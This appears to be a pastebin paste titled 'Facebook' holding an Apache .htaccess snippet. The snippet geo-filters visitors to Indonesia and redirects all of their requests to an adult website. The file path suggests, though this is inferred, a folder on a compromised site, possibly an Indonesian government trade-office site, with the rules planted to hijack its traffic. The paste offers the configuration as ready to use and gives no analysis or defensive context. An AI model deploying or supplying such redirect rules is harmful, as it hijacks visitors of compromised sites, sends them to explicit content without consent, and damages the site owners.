Facebook
From NowMeee, 2 Weeks ago, written in Plain Text.
Embed
Download Paste or View Raw
Hits: 110
  1. <IfModule mod_geoip.c>
  2.     GeoIPEnable On
  3.     GeoIPDBFile /home/bankd/public_html/disperindag/beli/GeoLite2-City.mmdb
  4.     SetEnvIf GEOIP_COUNTRY_CODE ID AllowCountry
  5.     Deny from all
  6.     Allow from env=AllowCountry
  7. </IfModule>
  8. RewriteEngine On
  9. RewriteCond %{ENV:AllowCountry} !^$
  10. RewriteRule ^(.*)$ http://xnxx.com/$1 [L,R=301]